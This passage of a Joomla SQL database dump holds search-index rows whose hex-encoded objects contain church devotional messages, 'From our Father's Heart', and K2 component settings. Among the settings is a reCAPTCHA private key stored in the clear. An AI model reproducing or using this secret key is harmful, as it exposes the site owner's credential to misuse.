757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2239223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2232373a66726f6d2d6f75722d6661746865722d732d68656172742d32362d30322d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f32372d66726f6d2d6f75722d6661746865722d732d68656172742d32362d30322d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3237223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32373a66726f6d2d6f75722d6661746865722d732d68656172742d32362d30322d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832362f30322f3230313729223b733a31313a226465736372697074696f6e223b733a3338343a2220446561726c792062656c6f766564206f6620476f642c204c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f7572206861626974732e2057686174206861626974732061726520796f752063756c7469766174696e6720696e20796f7572206c6966653f205468652068616269747320796f7520616c6c6f7720746f2067726f7720616e642066657374657220696e20796f7572206c6966652077696c6c2064657465726d696e6520776865726520796f752061727269766520696e20796f75722064657374696e79206a6f75726e65792e20596f757220686162697473206172652076656869636c657320746861742064657465726d696e6520776865726520796f75206576656e7475616c6c7920656e6420757020696e206c69666520616e642064657374696e792e204c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f75722068616269742e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d32362031373a34393a3237223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d32362031373a34393a3237223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(260, 'index.php?option=com_k2&view=item&id=29', 'index.php?option=com_k2&view=item&id=29:from-our-father-s-heart-05-03-2017', 'From our Father\'s Heart (05/03/2017)', ' Dearly beloved of God, Let your training in the Dream Centre become your habits. What habits are you cultivating in your life? The habits you allow to grow and fester in your life will determine where you arrive in your destiny journey. Your habits are vehicles that determine where you eventually end up in life and destiny. Let your training in the Dream Centre become your habit. The Lord has told us that the Dream Centre is not just a church, the Dream Centre is training. ', '2017-06-25 14:19:35', '94b48ca35e451d70fcc16a0d08725c41', 1, 1, 1, '*', '2017-03-05 08:38:12', '0000-00-00 00:00:00', '2017-03-05 08:38:12', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223239223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d30352d30332d32303137223b733a373a2273756d6d617279223b733a3439363a223c703e446561726c792062656c6f766564206f6620476f642cc2a03c2f703e0d0a3c703e4c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f7572206861626974732e2057686174206861626974732061726520796f752063756c7469766174696e6720696e20796f7572206c6966653f205468652068616269747320796f7520616c6c6f7720746f2067726f7720616e642066657374657220696e20796f7572206c6966652077696c6c2064657465726d696e6520776865726520796f752061727269766520696e20796f75722064657374696e79206a6f75726e65792e20596f757220686162697473206172652076656869636c657320746861742064657465726d696e6520776865726520796f75206576656e7475616c6c7920656e6420757020696e206c69666520616e642064657374696e792e204c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f75722068616269742e20546865204c6f72642068617320746f6c6420757320746861742074686520447265616d2043656e747265206973206e6f74206a7573742061206368757263682c2074686520447265616d2043656e74726520697320747261696e696e672e3c2f703e0d0a223b733a343a22626f6479223b733a323331353a220d0a3c703e5468657265666f726520796f75206d757374206265636f6d65206120636f6e7363696f7573206c6561726e657220616e642074616b6520747261696e696e6720736572696f75732ec2a03c2f703e0d0a3c703e54686520626573742077617920746f2067657420746865206d6f7374206f6620796f757220747261696e696e6720696e2074686520686f75736520697320746f207472616e736c61746520796f757220747261696e696e6720746f20796f7572206861626974732e2054686520616c6c2d6e6967687420747261696e696e67732c20746865207072617965722070726f6772616d7320616e64207363686564756c652c20746865206162696c69747920746f2073697420646f776e20616e64206c697374656e206163746976656c7920616e6420696e74656e746c7920746f20736f756e64207465616368696e672069732061696d6564206174206275696c64696e6720696e6372656173656420636170616369747920696e20796f7572206c69666520616e6420697320737570706f73656420746f206265636f6d6520612070617274206f6620796f7572206461696c79206c696665207374796c652e2054686520726561736f6e20666f7220796f7572207365656d6c7920746f75676820747261696e696e672069732062656361757365206f66207468652064657374696e7920616e642061737369676e6d656e74206f6620476f642068616e67696e67206f6e20796f7572206c69666520616e6420796f752063616e6e6f74206166666f726420746f20626520636172656c657373207769746820796f757220747261696e696e672e20596f75206d757374207472616e736c61746520747261696e696e6720696e746f2068616269742e20416e797468696e6720796f7520646f20636f6e73697374656e746c7920666f72207477656e7479206f6e652064617973206265636f6d657320796f75722068616269742e2041646f70742074686520706f7369746976652068616269747320616e64206c65742069742062652070617274206f6620796f7572206c6966652e20496e20736f20646f696e6720796f7520776f756c64206265207365637572696e672074686520677265617420667574757265207468617420476f64206861732070726573657276656420666f7220796f7520696e2064657374696e792ec2a03c2f703e0d0a3c703e427265616b2062616420616e64206e656761746976652068616269747320616e64206c65742074686520486f6c79205370697269742068656c7020796f752062656361757365207468652062616420616e64206e656761746976652068616269747320796f7520646f206e6f7420636865636b20616e6420627265616b206e6f772077696c6c2067726f77206f7574206f662068616e6420696e746f20737472616e67652073696e732c20746861742077696c6c206c696d697420686f772065666665637469766520616e642072656c6576616e7420796f752077696c6c20626520696e20746865207465727261696e206f6620796f75722064657374696e792e2049206861766520616c7761797320746f6c6420796f7520746861742074686520646576696c206973206120736d617274206669676874657220616e64206973206c6f6f6b696e6720666f7220686f7720746f206d616b6520796f7520756e66697420616e6420706f7765726c657373207768656e20796f7520636f6e66726f6e742068696d20696e2074686520706c616365206f6620796f757220707572706f736520696e20476f642e20446f206e6f742066616c6c20666f72207468652064656d6f6e6963206c6965206f662074686520646576696c2074686174206d616b657320796f75206665656c732074686174207468652064656d616e6473206f6620747261696e696e672061726520746f6f206d75636820666f7220796f752c20646f6ee2809974207065616b20746f6f20736f6f6e2e2041766f69642070656f706c652077686f206d616b6520796f75206665656c2074686174207468652064656d616e64732061726520746f6f206d7563682ec2a03c2f703e0d0a3c703e52656d656d626572207468617420747261696e696e67206d69676874206e6f74206265207377656574207768656e20796f752061726520676f696e67207468726f7567682c20686f77657665722074686520737472656e6774682c2063686172616374657220616e642076616c7565206974206164647320746f20796f7572206c6966652069732062656175746966756c20746f206265686f6c64207768656e20796f7520737461727420746f2066756e6374696f6e20696e20796f75722064657374696e792e205468657265206172652070656f706c652077686f2074727920746f206573636170652066726f6d20747261696e696e6720616e6420636f6d706c61696e20696e2074686520706c616365206f6620747261696e696e672c206f6e6c7920746f20726567726574206c61746572207768656e20746865207375627374616e6365207468617420697320737570706c69656420696e2074686520706c616365206f6620747261696e696e67206973206265696e672064656d616e646564206f66207468656d20616e6420746865792066696e6420697420646966666963756c7420746f2070726f647563652e20c2a05472616e736c61746520796f757220747261696e696e6720696e746f206861626974732c20627265616b2062616420616e64206e656761746976652068616269747320626563617573652064656d6f6e69632066726f6e74732061637475616c6c7920616476616e6365207468726f75676820756e62726f6b656e206e65676174697665206861626974732068656e63652c20726f6262696e6720796f75206f6620796f75722066757475726520696e20476f642e3c2f703e0d0a3c703ec2a04d617920796f75206e6f7420776173746520646976696e6520747261696e696e6720616e64207072657061726174696f6e2ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732073657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d32302031373a35343a3037223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a22312